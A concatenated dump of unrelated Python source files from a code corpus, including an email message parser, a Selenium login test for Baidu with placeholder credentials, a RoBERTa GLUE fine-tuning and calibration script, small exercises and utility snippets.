parser.add_argument('--noise', type=float, default=-1)
parser.add_argument('--run_num', type=str, default='')
parser.add_argument('--num_slow', type=int, default=2)
parser.add_argument('--log_dir', type=str, default='logs/mog4_fast')
args = parser.parse_args()
main(args)
| 2.609375 | 3 |
sendria/message.py | scottcove/sendria | 85 | 10869 | <gh_stars>10-100
__all__ = ['Message']
import uuid
from email.header import decode_header as _decode_header
from email.message import Message as EmailMessage
from email.utils import getaddresses
from typing import Union, List, Dict, Any
class Message:
__slots__ = (
'id',
'sender_envelope', 'sender_message',
'recipients_envelope', 'recipients_message_to',
'recipients_message_cc', 'recipients_message_bcc',
'subject',
'source',
'size', 'type', 'peer',
'parts',
'created_at',
)
@classmethod
def from_email(cls, email: EmailMessage) -> 'Message':
o = cls()
o.id = None
o.sender_envelope = cls.decode_header(email['X-MailFrom'])
o.sender_message = cls.decode_header(email['FROM'])
o.recipients_envelope = email['X-RcptTo']
o.recipients_message_to = cls.split_addresses(cls.decode_header(email['TO'])) if 'TO' in email else []
o.recipients_message_cc = cls.split_addresses(cls.decode_header(email['CC'])) if 'CC' in email else []
o.recipients_message_bcc = cls.split_addresses(cls.decode_header(email['BCC'])) if 'BCC' in email else []
o.subject = cls.decode_header(email['Subject'])
o.source = email.as_string()
o.size = len(o.source)
o.type = email.get_content_type()
o.peer = ':'.join([i.strip(" '()")for i in email['X-Peer'].split(',')])
o.parts = []
o.created_at = None
for part in cls.iter_message_parts(email):
cid = part.get('Content-Id') or str(uuid.uuid4())
if cid[0] == '<' and cid[-1] == '>':
cid = cid[1:-1]
o.parts.append({'cid': cid, 'part': part})
return o
def to_dict(self) -> Dict[str, Any]:
return {
k: getattr(self, k)
for k in self.__slots__
}
def __repr__(self) -> str:
r = []
for k in self.__slots__:
if k not in ('source', 'parts'):
r.append(f'{k}={getattr(self, k)}')
else:
r.append(f'{k}=...')
return f'<EmailMessage: {", ".join(r)}>'
@classmethod
def decode_header(cls, value: Union[str, bytes, None]) -> str:
if not value:
return ''
headers = []
for decoded, charset in _decode_header(value):
if isinstance(decoded, str):
headers.append(decoded.encode(charset or 'utf-8'))
else:
headers.append(decoded)
return (b''.join(headers)).decode()
@classmethod
def split_addresses(cls, value: str) -> List[str]:
return [('{0} <{1}>'.format(name, addr) if name else addr)
for name, addr in getaddresses([value])]
@classmethod
def iter_message_parts(cls, email: EmailMessage) -> EmailMessage:
if email.is_multipart():
for payload in email.get_payload():
for part in cls.iter_message_parts(payload):
yield part
else:
yield email
| 2.46875 | 2 |
myApps/test_web.py | Rocket-hodgepodge/NewsWeb | 0 | 10870 | <reponame>Rocket-hodgepodge/NewsWeb
from selenium import webdriver
from selenium.webdriver.common.by import By
from selenium.webdriver.support.ui import WebDriverWait
from selenium.webdriver.support import expected_conditions as EC
import unittest
class NewVisitorTest(unittest.TestCase):
def setUp(self):
self.timeout = 40
self.browser = webdriver.Chrome()
self.browser.set_page_load_timeout(self.timeout)
self.wait = WebDriverWait(self.browser, self.timeout)
def tearDown(self):
self.browser.quit()
def test_can_start_a_list_and_retrieve_it_later(self):
self.browser.get('https://www.baidu.com')
self.assertIn('百度', self.browser.title)
login_link = self.wait.until(
EC.element_to_be_clickable((By.LINK_TEXT, '登录')))
login_link.click()
login_link_2 = self.wait.until(
EC.element_to_be_clickable((By.ID, 'TANGRAM__PSP_10__footerULoginBtn')))
login_link_2.click()
username_input = self.wait.until(
EC.presence_of_element_located((By.ID, 'TANGRAM__PSP_10__userName')))
username_input.clear()
username_input.send_keys('<PASSWORD>')
password_input = self.wait.until(
EC.presence_of_element_located((By.ID, '<PASSWORD>__PSP_10__password')))
password_input.clear()
password_input.send_keys('<PASSWORD>')
login_submit_button = self.wait.until(
EC.element_to_be_clickable((By.ID, 'TANGRAM__PSP_10__submit')))
login_submit_button.click()
username_span = self.wait.until(
EC.presence_of_element_located((By.CSS_SELECTOR, '#s_username_top > span')))
self.assertEqual(username_span.text, 'PebbleApp')
# user_login_link = self.browser.find_element_by_id('TANGRAM__PSP_10__footerULoginBtn')
# user_login_link.click()
if __name__ == '__main__':
unittest.main(warnings='ignore')
| 2.640625 | 3 |
nce_glue/run_glue.py | salesforce/ebm_calibration_nlu | 7 | 10871 | <filename>nce_glue/run_glue.py<gh_stars>1-10
# coding=utf-8
# Copyright 2018 The Google AI Language Team Authors and The HuggingFace Inc. team.
# Copyright (c) 2018, NVIDIA CORPORATION. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
""" Finetuning the library models for sequence classification on GLUE (Bert, XLM, XLNet, RoBERTa, Albert, XLM-RoBERTa)."""
import dataclasses
import logging
import os, math
import sys, copy
from dataclasses import dataclass, field
from typing import Callable, Dict, Optional
import numpy as np
import torch
from transformers import AutoConfig, AutoModelForSequenceClassification, AutoTokenizer, EvalPrediction, GlueDataset
from transformers import BertModel, BertConfig
from transformers import GlueDataTrainingArguments as DataTrainingArguments
from transformers import (
HfArgumentParser,
TrainingArguments,
glue_compute_metrics,
glue_output_modes,
glue_tasks_num_labels,
set_seed,
)
from my_robustness import MyRandomTokenNoise
from my_trainer import MyTrainer
from my_glue_dataset import MyGlueDataset
from my_modeling_roberta import MyRobertaForSequenceClassification, MyRobertaForNCESequenceClassification
from transformers.data.processors.utils import InputFeatures, InputExample
#import matplotlib
#matplotlib.use('Agg')
#import matplotlib.pyplot as plt
from my_utils import setLogger
#import checklist_utils
logger = logging.getLogger()
@dataclass
class ModelArguments:
"""
Arguments pertaining to which model/config/tokenizer we are going to fine-tune from.
"""
model_name_or_path: str = field(
metadata={"help": "Path to pretrained model or model identifier from huggingface.co/models"}
)
config_name: Optional[str] = field(
default=None, metadata={"help": "Pretrained config name or path if not the same as model_name"}
)
tokenizer_name: Optional[str] = field(
default=None, metadata={"help": "Pretrained tokenizer name or path if not the same as model_name"}
)
cache_dir: Optional[str] = field(
default=None, metadata={"help": "Where do you want to store the pretrained models downloaded from s3"}
)
@dataclass
class CustomArguments:
do_eval_calibration: bool = field(default=False, metadata={"help": "Whether to print calibration."})
do_eval_scaling_binning_calibration: bool = field(default = False)
do_eval_noise_robustness: bool = field(default = False)
do_eval_checklist: bool = field(default = False)
do_energy_analysis: bool = field(default = False)
train_from_scratch: bool = field(default=False, metadata={"help": "Train from scratch."})
layer_num: int = field(default=2, metadata={"help": "The hidden layer number"})
eval_steps: int = field(default = -1, metadata = {"help": "evaluate steps"})
#my_learning_rate: float = field(default=2e-5) #just use the existing learning_rate
my_random_noise_rate: float = field(default=0)
fast_debug: int = field(default = 0)
nce_noise_file: str = field(default=None)
nce_noise_eval_file: str = field(default=None)
nce_noise_ratio: int = field(default = 1)
nce_lambda: float = field(default = 1)
noiselm_mode: str = field(default='normal')
nce_noise_batch_size: int = field(default = 32, metadata={'help':'nce_noise_batch'})
train_mode: str = field(default='normal') #or nce_noise
nce_mode: str = field(default='normal') #or normal or hidden or labeled or selflabeled
pcal_num_updates: int = field(default=10)
pcal_bin_size: int = field(default=20)
pcalloss_start_epochs: int = field(default=0)
pcal_train: bool = field(default=False)
pcalloss_lambda: float = field(default=1)
pcalloss_type: str = field(default='KL')
def main():
# See all possible arguments in src/transformers/training_args.py
# or by passing the --help flag to this script.
# We now keep distinct sets of args, for a cleaner separation of concerns.
parser = HfArgumentParser((ModelArguments, DataTrainingArguments, TrainingArguments, CustomArguments))
if len(sys.argv) == 2 and sys.argv[1].endswith(".json"):
# If we pass only one argument to the script and it's the path to a json file,
# let's parse it to get our arguments.
model_args, data_args, training_args, my_args = parser.parse_json_file(json_file=os.path.abspath(sys.argv[1]))
else:
model_args, data_args, training_args, my_args = parser.parse_args_into_dataclasses()
all_args = (model_args, data_args, training_args, my_args)
#training_args.learning_rate = my_args.my_learning_rate
if (
os.path.exists(training_args.output_dir)
and os.listdir(training_args.output_dir)
and training_args.do_train
and not training_args.overwrite_output_dir
):
raise ValueError(
f"Output directory ({training_args.output_dir}) already exists and is not empty. Use --overwrite_output_dir to overcome."
)
# Setup logging
logging.basicConfig(
format="%(asctime)s - %(levelname)s - %(name)s - %(message)s",
datefmt="%m/%d/%Y %H:%M:%S",
level=logging.INFO if training_args.local_rank in [-1, 0] else logging.WARN,
)
log_fn = training_args.output_dir + '/log_' + ('train_' if training_args.do_train else '') + ('eval_' if training_args.do_eval else '') + ('evalcalibration_' if my_args.do_eval_calibration else '') + '.txt'
print('logger file will be set to', log_fn)
os.system('mkdir -p ' + training_args.output_dir)
setLogger(logger, log_fn)
my_args.log_fn = log_fn
for kk in range(5): logger.info('==hostname %s', os.uname()[1])
logger.warning(
"Process rank: %s, device: %s, n_gpu: %s, distributed training: %s, 16-bits training: %s",
training_args.local_rank,
training_args.device,
training_args.n_gpu,
bool(training_args.local_rank != -1),
training_args.fp16,
)
logger.info("Training/evaluation parameters %s", training_args)
# Set seed
set_seed(training_args.seed)
try:
num_labels = glue_tasks_num_labels[data_args.task_name]
output_mode = glue_output_modes[data_args.task_name]
except KeyError:
raise ValueError("Task not found: %s" % (data_args.task_name))
# Load pretrained model and tokenizer
#
# Distributed training:
# The .from_pretrained methods guarantee that only one local process can concurrently
# download model & vocab.
config = AutoConfig.from_pretrained(
model_args.config_name if model_args.config_name else model_args.model_name_or_path,
num_labels=num_labels,
finetuning_task=data_args.task_name,
cache_dir=model_args.cache_dir,
)
tokenizer = AutoTokenizer.from_pretrained(
model_args.tokenizer_name if model_args.tokenizer_name else model_args.model_name_or_path,
cache_dir=model_args.cache_dir,
)
if my_args.train_mode == 'normal':
assert('roberta' in model_args.model_name_or_path.lower())
#model = AutoModelForSequenceClassification.from_pretrained(
model = MyRobertaForSequenceClassification.from_pretrained(
model_args.model_name_or_path,
from_tf=bool(".ckpt" in model_args.model_name_or_path),
config=config,
cache_dir=model_args.cache_dir,
)
if my_args.train_mode == 'nce_noise':
#nce_model = MyRobertaForSequenceClassification(config)
assert('roberta' in model_args.model_name_or_path.lower())
model = MyRobertaForNCESequenceClassification.from_pretrained(
model_args.model_name_or_path,
from_tf=bool(".ckpt" in model_args.model_name_or_path),
config=config,
cache_dir=model_args.cache_dir,
)
if my_args.train_from_scratch:
print('=== training from scratch! reinitilize weights')
embed_bak = copy.deepcopy(model.bert.embeddings)
layer_bak = copy.deepcopy(model.bert.encoder.layer)
model.init_weights()
LL = my_args.layer_num
print('=== applying layer_num', LL)
# Initializing a BERT bert-base-uncased style configuration
new_config = BertConfig(num_hidden_layers=LL)
# Initializing a model from the bert-base-uncased style configuration
new_bert = BertModel(new_config)
print('=== using pretrained embedding')
new_bert.embeddings = embed_bak
"""
for l in range(LL):
print('copying encoder layer', l)
new_bert.encoder.layer[l] = layer_bak[l]
"""
model.bert = new_bert
model.config.num_hidden_layers = LL
nce_noise_train_dataset, nce_noise_eval_dataset = None, None
if my_args.train_mode == 'nce_noise' and training_args.do_train:
# Get datasets
nce_noise_train_dataset = (MyGlueDataset(data_args, tokenizer=tokenizer, cache_dir=model_args.cache_dir, special_mode = 'nce_noise', nce_noise_file = my_args.nce_noise_file, mode = 'train', for_noiselm = False, my_args = my_args))
nce_noise_eval_dataset = (MyGlueDataset(data_args, tokenizer=tokenizer, cache_dir=model_args.cache_dir, special_mode = 'nce_noise', nce_noise_file = my_args.nce_noise_eval_file, mode = 'dev', for_noiselm = False, my_args = my_args))
# Get datasets
train_dataset = (
MyGlueDataset(data_args, tokenizer=tokenizer, cache_dir=model_args.cache_dir, my_args = my_args)
)
eval_dataset = (MyGlueDataset(data_args, tokenizer=tokenizer, mode="dev", cache_dir=model_args.cache_dir, my_args = my_args))
test_dataset = (
MyGlueDataset(data_args, tokenizer=tokenizer, mode="test", cache_dir=model_args.cache_dir, my_args = my_args)
if training_args.do_predict
else None
)
def build_compute_metrics_fn(task_name: str) -> Callable[[EvalPrediction], Dict]:
def compute_metrics_fn(p: EvalPrediction):
if output_mode == "classification":
preds = np.argmax(p.predictions, axis=1)
elif output_mode == "regression":
preds = np.squeeze(p.predictions)
return glue_compute_metrics(task_name, preds, p.label_ids)
return compute_metrics_fn
logger.info('constructing datasets (splitting eval_dataset) for calibration...')
dataset_cal_dev1 = copy.deepcopy(eval_dataset)
dataset_cal_dev2 = copy.deepcopy(eval_dataset)
dataset_cal_tr = copy.deepcopy(train_dataset)
cal_num = int(len(eval_dataset) / 2)
dataset_cal_dev1.features = dataset_cal_dev1.features[:cal_num]
dataset_cal_dev2.features = dataset_cal_dev2.features[-cal_num:]
#dataset_cal_tr.features = dataset_cal_tr.features[-cal_num:]
logger.info('setting eval_dataset to dataset_cal_dev2...')
eval_dataset = dataset_cal_dev2
# Initialize our Trainer
trainer = MyTrainer(
model=model,
args=training_args,
train_dataset=train_dataset,
eval_dataset=eval_dataset,
compute_metrics=build_compute_metrics_fn(data_args.task_name),
tokenizer = tokenizer,
my_args = my_args,
)
print('=== random_noise_rate:', my_args.my_random_noise_rate)
my_noise = MyRandomTokenNoise(tokenizer, my_args.my_random_noise_rate)
input_transform = None
if my_args.my_random_noise_rate > 0:
input_transform = my_noise.add_random_noise
# Training
final_evalres_savefn = None
if training_args.do_train:
#if my_args.train_mode == 'nce_noise':
# trainer.nce_train(model_path=model_args.model_name_or_path if os.path.isdir(model_args.model_name_or_path) else None, input_transform = input_transform)
#else:
set_seed(training_args.seed) #set seed again before constructing suite, so that it will be the same thing when do_eval
suite = None
#suite = checklist_utils.construct_checklist_suite(model, tokenizer, eval_dataset, all_args)
return_d = {}
trainer.train(model_path=model_args.model_name_or_path if os.path.isdir(model_args.model_name_or_path) else None, input_transform = input_transform, train_mode = my_args.train_mode, nce_noise_dataset = nce_noise_train_dataset, nce_noise_ratio = my_args.nce_noise_ratio, nce_noise_bz = my_args.nce_noise_batch_size, nce_mode = my_args.nce_mode, nce_noise_eval_dataset = nce_noise_eval_dataset, return_d = return_d, checklist_suite = suite, all_args = all_args)
trainer.save_model()
# For convenience, we also re-save the tokenizer to the same directory,
# so that you can share your model easily on huggingface.co/models =)
if trainer.is_world_master():
tokenizer.save_pretrained(training_args.output_dir)
logger.info('===PRINTING EVAL_RES_LIS===')
for eval_res in return_d['eval_res_lis']:
logger.info(str(eval_res))
final_evalres_savefn = training_args.output_dir + '/eval_res_save/final_eval_res.save'
torch.save(return_d['eval_res_lis'], final_evalres_savefn)
logger.info('eval res saved to %s', final_evalres_savefn)
final_eval_results, final_checklist_eval_results = {}, {}
final_nce_eval_results, final_nce_train_results = {}, {}
# evaluation
eval_results = {}
"""
if data_args.task_name == "mnli":
mnli_mm_data_args = dataclasses.replace(data_args, task_name="mnli-mm")
logger.info('===SWITCHING to mnli-mm for test')
eval_dataset = GlueDataset(mnli_mm_data_args, tokenizer=tokenizer, mode="dev", cache_dir=model_args.cache_dir)
"""
logger.info('seed: %d', training_args.seed)
if training_args.do_eval:
logger.info("*** evaluate ***")
set_seed(training_args.seed) #set seed again before eval
# loop to handle mnli double evaluation (matched, mis-matched)
eval_datasets = [eval_dataset]
#""" #we only look at the matched dev-set for mnli (mm is mismatched)
assert(len(eval_datasets) == 1)
for eval_dataset in eval_datasets:
trainer.compute_metrics = build_compute_metrics_fn(eval_dataset.args.task_name)
#prediction_output = trainer.predict(test_dataset=eval_dataset)
eval_result = trainer.evaluate(eval_dataset=eval_dataset, input_transform = input_transform)
if my_args.train_mode == 'nce_noise':
eval_nce_result = trainer.nce_evaluate(nce_noise_eval_dataset)
final_nce_eval_results.update(eval_nce_result)
train_nce_result = trainer.nce_evaluate(nce_noise_train_dataset, max_step = 500)
final_nce_train_results.update(train_nce_result)
output_eval_file = os.path.join(
training_args.output_dir, f"eval_results_{eval_dataset.args.task_name}.txt"
)
if trainer.is_world_master():
with open(output_eval_file, "w") as writer:
logger.info("***** eval results {} *****".format(eval_dataset.args.task_name))
for key, value in eval_result.items():
logger.info(" %s = %s", key, value)
writer.write("%s = %s\n" % (key, value))
eval_results.update(eval_result)
#final_eval_results['eval_acc'] = eval_result['eval_acc']
final_eval_results.update(eval_result)
if my_args.do_eval_checklist:
logger.info('*** eval checklist***')
set_seed(training_args.seed) #set seed again before eval
suite = checklist_utils.construct_checklist_suite(model, tokenizer, eval_dataset, all_args)
cres = checklist_utils.run_checklist_suite(model, tokenizer, eval_dataset, all_args, given_suite = suite, verbose = True)
final_checklist_eval_results.update(cres)
"""
if data_args.task_name.lower() == 'qqp':
cres = checklist_utils.do_checklist_QQP(model, tokenizer, eval_dataset, all_args)
final_checklist_eval_results.update(cres)
if data_args.task_name.lower() == 'qnli':
cres = checklist_utils.do_checklist_QNLI(model, tokenizer, eval_dataset, all_args)
final_checklist_eval_results.update(cres)
if data_args.task_name.lower() == 'sst-2':
cres = checklist_utils.do_checklist_SST2(model, tokenizer, eval_dataset, all_args)
final_checklist_eval_results.update(cres)
"""
"""
for checklist_trans in ['typo', 'typo^2']:
eval_checklist_dataset = MyGlueDataset(data_args, tokenizer=tokenizer, mode="dev", cache_dir=model_args.cache_dir, checklist_transform = checklist_trans, my_args = my_args)
eval_result = trainer.evaluate(eval_dataset=eval_checklist_dataset, input_transform = None)
for s in eval_result:
final_checklist_eval_results['checklist_{}_{}'.format(checklist_trans, s)] = eval_result[s]
"""
if my_args.do_eval_noise_robustness:
# loop to handle mnli double evaluation (matched, mis-matched)
eval_datasets = [eval_dataset]
set_seed(training_args.seed) #set seed again before eval
"""
if data_args.task_name == "mnli":
mnli_mm_data_args = dataclasses.replace(data_args, task_name="mnli-mm")
eval_datasets.append(
GlueDataset(mnli_mm_data_args, tokenizer=tokenizer, mode="dev", cache_dir=model_args.cache_dir)
)
""" #we only look at the matched dev-set for mnli (mm is mismatched)
for noise_rate in [0.1, 0.2]:
logger.info('*** eval_noise_robustness rate: %f ***', noise_rate)
my_noise = MyRandomTokenNoise(tokenizer, noise_rate)
input_transform = my_noise.add_random_noise
assert(len(eval_datasets) == 1)
for eval_dataset in eval_datasets:
trainer.compute_metrics = build_compute_metrics_fn(eval_dataset.args.task_name)
#prediction_output = trainer.predict(test_dataset=eval_dataset)
eval_result = trainer.evaluate(eval_dataset=eval_dataset, input_transform = input_transform)
output_eval_file = os.path.join(
training_args.output_dir, f"eval_results_{eval_dataset.args.task_name}.txt"
)
if trainer.is_world_master():
with open(output_eval_file, "w") as writer:
logger.info("***** eval results {} *****".format(eval_dataset.args.task_name))
for key, value in eval_result.items():
logger.info(" %s = %s", key, value)
writer.write("%s = %s\n" % (key, value))
if 'eval_mnli/acc' in eval_result: eval_result['eval_acc'] = eval_result['eval_mnli/acc']
final_eval_results['randomnoise{}_eval_acc'.format(noise_rate)] = eval_result['eval_acc']
import calibration as cal
from my_calibration import TScalCalibrator
def do_cal(trainer, eval_d, do_postcal = False, do_plattbin = True, do_tscal = True, tr_d = None, ss = ''):
prediction_output = trainer.predict(test_dataset=eval_d)
probs_eval, labels_eval = torch.softmax(torch.FloatTensor(prediction_output.predictions), dim = -1), torch.LongTensor(prediction_output.label_ids)
if do_postcal == False:
ece = cal.get_ece(probs_eval.numpy(), labels_eval.numpy(), num_bins = 20)
acc = torch.sum(torch.argmax(probs_eval, dim = -1) == labels_eval).item() * 1.0 / labels_eval.size(0)
res = {}
if data_args.task_name.lower() == 'cola':
mcc_res = trainer.compute_metrics(EvalPrediction(predictions = prediction_output.predictions, label_ids = prediction_output.label_ids))
res[ss + 'mcc'] = mcc_res['mcc']
res.update({ss + 'acc': acc, ss + 'ece': ece})
logger.info('cal_res: %s', str(res))
return res
prediction_output = trainer.predict(test_dataset=tr_d)
probs_tr, labels_tr = torch.softmax(torch.FloatTensor(prediction_output.predictions), dim = -1), torch.LongTensor(prediction_output.label_ids)
res = {}
if do_plattbin == True:
calibrator = cal.PlattBinnerMarginalCalibrator(len(probs_tr), num_bins=20)
calibrator.train_calibration(probs_tr.numpy(), labels_tr.numpy())
calibrated_probs_eval = torch.FloatTensor(calibrator.calibrate(probs_eval.numpy()))
ece = cal.get_ece(calibrated_probs_eval.numpy(), labels_eval.numpy(), num_bins = 20)
acc = torch.sum(torch.argmax(calibrated_probs_eval, dim = -1) == labels_eval).item() * 1.0 / labels_eval.size(0)
if data_args.task_name.lower() == 'cola':
mcc_res = trainer.compute_metrics(EvalPrediction(predictions = torch.log(calibrated_probs_eval).numpy(), label_ids = labels_eval.numpy()))
res[ss + 'mcc'] = mcc_res['mcc']
res.update({ss + 'plattbin_acc': acc, ss + 'plattbin_ece': ece})
if do_tscal == True:
calibrator = TScalCalibrator(num_bins=20)
calibrator.train_calibration(probs_tr.cpu(), labels_tr.cpu())
calibrated_probs_eval = torch.FloatTensor(calibrator.calibrate(probs_eval.cpu()))
ece = cal.get_ece(calibrated_probs_eval.numpy(), labels_eval.numpy(), num_bins = 20)
acc = torch.sum(torch.argmax(calibrated_probs_eval, dim = -1) == labels_eval).item() * 1.0 / labels_eval.size(0)
if data_args.task_name.lower() == 'cola':
mcc_res = trainer.compute_metrics(EvalPrediction(predictions = torch.log(calibrated_probs_eval).numpy(), label_ids = labels_eval.numpy()))
res[ss + 'mcc'] = mcc_res['mcc']
res.update({ss + 'tscal_acc': acc, ss + 'tscal_ece': ece})
logger.info('cal_res: %s', str(res))
return res
if my_args.do_eval_calibration:
logger.info("*** do calbiration ***")
#if data_args.task_name.lower() == 'cola':
#it's cola, let's do evaluate for mcc
#res = trainer.evaluate(eval_dataset = dataset_cal_dev2)
set_seed(training_args.seed) #set seed again before eval
drawcal_res = trainer.eval_calibration(dataset_cal_dev2, verbose = True, fig_fn = training_args.output_dir + '/{}_calibration.pdf'.format(data_args.task_name))
save_fn = training_args.output_dir + '/drawcal.save'
logger.info('saving drawcal_res to %s', save_fn)
torch.save(drawcal_res, save_fn)
cal_res = do_cal(trainer, dataset_cal_dev2, do_postcal = False, ss = 'cal_ori_')
final_eval_results.update(cal_res)
if my_args.do_eval_scaling_binning_calibration:
logger.info('*** do scaling_binning calibration ***')
set_seed(training_args.seed)
cal_res = {}
cal_res.update(do_cal(trainer, dataset_cal_dev2, do_postcal = True, do_plattbin = False, do_tscal = True, tr_d = dataset_cal_dev1, ss = 'cal_dev_'))
cal_res.update(do_cal(trainer, dataset_cal_dev2, do_postcal = True, do_plattbin = False, do_tscal = True, tr_d = dataset_cal_tr, ss = 'cal_train_'))
logger.info('===scaling_binning_calibration %s', str(cal_res))
final_eval_results.update(cal_res)
if training_args.do_predict:
logging.info("*** Test ***")
test_datasets = [test_dataset]
if data_args.task_name == "mnli":
mnli_mm_data_args = dataclasses.replace(data_args, task_name="mnli-mm")
test_datasets.append(
GlueDataset(mnli_mm_data_args, tokenizer=tokenizer, mode="test", cache_dir=model_args.cache_dir)
)
for test_dataset in test_datasets:
predictions = trainer.predict(test_dataset=test_dataset).predictions
if output_mode == "classification":
predictions = np.argmax(predictions, axis=1)
output_test_file = os.path.join(
training_args.output_dir, f"test_results_{test_dataset.args.task_name}.txt"
)
if trainer.is_world_master():
with open(output_test_file, "w") as writer:
logger.info("***** Test results {} *****".format(test_dataset.args.task_name))
writer.write("index\tprediction\n")
for index, item in enumerate(predictions):
if output_mode == "regression":
writer.write("%d\t%3.3f\n" % (index, item))
else:
item = test_dataset.get_labels()[item]
writer.write("%d\t%s\n" % (index, item))
if my_args.do_energy_analysis:
logger.info('*** do_energy_analysis ***')
eval_dataloader = trainer.get_eval_dataloader(dataset_cal_dev2)
logger.info('loading baseline model...')
if data_args.task_name.lower() == 'sst-2':
base_model = MyRobertaForSequenceClassification.from_pretrained('./exps/glue_baseline_roberta-base/SST-2/LR2e-5BA32MAXSTEP5233WARMSTEP314/')
if data_args.task_name.lower() == 'qnli':
base_model = MyRobertaForSequenceClassification.from_pretrained('./exps/glue_baseline_roberta-base/QNLI/LR2e-5BA32MAXSTEP8278WARMSTEP496')
if data_args.task_name.lower() == 'mrpc':
base_model = MyRobertaForSequenceClassification.from_pretrained('./exps/glue_baseline_roberta-base/MRPC/LR1e-5BA16MAXSTEP2296WARMSTEP137')
if data_args.task_name.lower() == 'mnli':
base_model = MyRobertaForSequenceClassification.from_pretrained('./exps/glue_baseline_roberta-base/MNLI/LR2e-5BA32MAXSTEP30968WARMSTEP1858/')
base_model = base_model.cuda()
lis_energy, lis_logits, lis_logits_base = [], [], []
for step, inputs in enumerate(eval_dataloader):
has_labels = any(inputs.get(k) is not None for k in ["labels", "lm_labels", "masked_lm_labels"])
for k, v in inputs.items():
inputs[k] = v.cuda()
return_d = {}
model.eval(); base_model.eval();
with torch.no_grad():
outputs = base_model(**inputs)
lis_logits_base.append(outputs[1])
inputs['special_mode'] = 'nce_noise'
inputs['nce_mode'] = my_args.nce_mode
inputs['return_d'] = return_d
inputs['nce_feed_type'] = 'data'
inputs['nce_noise_ratio'] = my_args.nce_noise_ratio
outputs = model(**inputs)
lis_energy.append(return_d['nce_logits'])
lis_logits.append(outputs[1])
all_energy = torch.cat(lis_energy, dim = 0).view(-1)
all_probs = torch.softmax(torch.cat(lis_logits, dim = 0), dim = -1)
all_probs_base = torch.softmax(torch.cat(lis_logits_base, dim = 0), dim = -1)
sorted_idx = all_energy.sort(descending = False)[1]
save_fn = training_args.output_dir + '/dev_energy.save'
logger.info('saving all_energy to %s', save_fn)
torch.save({'all_energy': all_energy.cpu(), 'all_probs': all_probs.cpu(), 'all_probs_base': all_probs_base.cpu()}, save_fn)
print('low energy:')
for idx in sorted_idx[:10].tolist():
print(idx, '\tenergy:', all_energy[idx].item(), 'prediction prob:', all_probs[idx].tolist(), 'prediction prob baseline:', all_probs_base[idx].tolist(), 'label:', dataset_cal_dev2[idx].label, 'text:', tokenizer.decode(dataset_cal_dev2[idx].input_ids[:100]))
print('high energy:')
for idx in sorted_idx[-10:].tolist():
if torch.argmax(all_probs_base[idx]).item() != dataset_cal_dev2[idx].label:
print(idx, '\tenergy:', all_energy[idx].item(), 'prediction prob:', all_probs[idx].tolist(), 'prediction prob baseline:', all_probs_base[idx].tolist(), 'label:', dataset_cal_dev2[idx].label, 'text:', tokenizer.decode(dataset_cal_dev2[idx].input_ids[:70]))
logger.info('output_dir: %s', training_args.output_dir)
if my_args.train_mode == 'nce_noise':
logger.info('===FINAL NCE_EVAL RESULT===')
report_str = '[EVAL_DATA] '
for idx in final_nce_eval_results: report_str += idx + ':' + str(final_nce_eval_results[idx])[:5] + ', '
logger.info('%s', report_str)
report_str = '[TRAIN_DATA] '
for idx in final_nce_train_results: report_str += idx + ':' + str(final_nce_train_results[idx])[:5] + ', '
logger.info('%s', report_str)
"""
logger.info('===FINAL CHECKLIST_EVAL RESULTS===')
report_str, ll = '', []
for idx in final_checklist_eval_results:
if idx != 'AVG':
report_str += idx + ':' + str(final_checklist_eval_results[idx] * 100)[:5] + '%, '
#ll.append(final_checklist_eval_results[idx])
logger.info('%s AVG: %s', report_str, str(final_checklist_eval_results['AVG'] * 100)[:5] + '%')
"""
logger.info('===FINAL EVAL RESULTS===')
report_str = ''
for idx in final_eval_results: report_str += idx + ':' + str(final_eval_results[idx])[:5] + ', '
logger.info('%s', report_str)
if final_evalres_savefn is not None:
logger.info(final_evalres_savefn)
return eval_results
def _mp_fn(index):
# For xla_spawn (TPUs)
main()
if __name__ == "__main__":
main()
| 1.78125 | 2 |
tools/python/myriad/__init__.py | TU-Berlin-DIMA/myriad-toolkit | 15 | 10872 | <filename>tools/python/myriad/__init__.py
__all__ = [ "assistant", "event", "error" ] | 1.054688 | 1 |
Python/Advanced/Tuples And Sets/Lab/SoftUni Party.py | EduardV777/Softuni-Python-Exercises | 0 | 10873 | guests=int(input())
reservations=set([])
while guests!=0:
reservationCode=input()
reservations.add(reservationCode)
guests-=1
while True:
r=input()
if r!="END":
reservations.discard(r)
else:
print(len(reservations))
VIPS=[]; Regulars=[]
for e in reservations:
if e[0].isnumeric():
VIPS.append(e)
else:
Regulars.append(e)
VIPS.sort(); Regulars.sort()
for k in VIPS:
print(k)
for k in Regulars:
print(k)
break | 3.625 | 4 |
locale/pot/api/plotting/_autosummary/pyvista-Plotter-remove_all_lights-1.py | tkoyama010/pyvista-doc-translations | 4 | 10874 | <filename>locale/pot/api/plotting/_autosummary/pyvista-Plotter-remove_all_lights-1.py
# Create a plotter and remove all lights after initialization.
# Note how the mesh rendered is completely flat
#
import pyvista as pv
plotter = pv.Plotter()
plotter.remove_all_lights()
plotter.renderer.lights
# Expected:
## []
_ = plotter.add_mesh(pv.Sphere(), show_edges=True)
plotter.show()
#
# Note how this differs from a plot with default lighting
#
pv.Sphere().plot(show_edges=True, lighting=True)
| 2.109375 | 2 |
einsum.py | odiak/einsum | 0 | 10875 | from typing import Dict, Tuple
import numpy as np
def einsum(expr: str, *args: Tuple[np.ndarray, ...], **kwargs) -> np.ndarray:
(a, b) = map(str.strip, expr.split("->"))
a_ = list(
map(lambda s: list(map(str.strip, s.split(","))), map(str.strip, a.split(";")))
)
b_ = list(map(str.strip, b.split(",")))
chars = "abcdefghijklmnopqrstuvwxyz"
char_map: Dict[str, str] = {}
i = 0
for cs in a_:
for c in cs:
if c not in char_map:
char_map[c] = chars[i]
i += 1
for c in b_:
if c not in char_map:
char_map[c] = chars[i]
i += 1
expr_ = "->".join(
[
",".join(map(lambda ss: "".join(map(lambda s: char_map[s], ss)), a_)),
"".join(map(lambda s: char_map[s], b_)),
]
)
return np.einsum(expr_, *args, **kwargs)
| 2.890625 | 3 |
aarhus/get_roots.py | mikedelong/aarhus | 0 | 10876 | <reponame>mikedelong/aarhus
import json
import logging
import os
import pickle
import sys
import time
import pyzmail
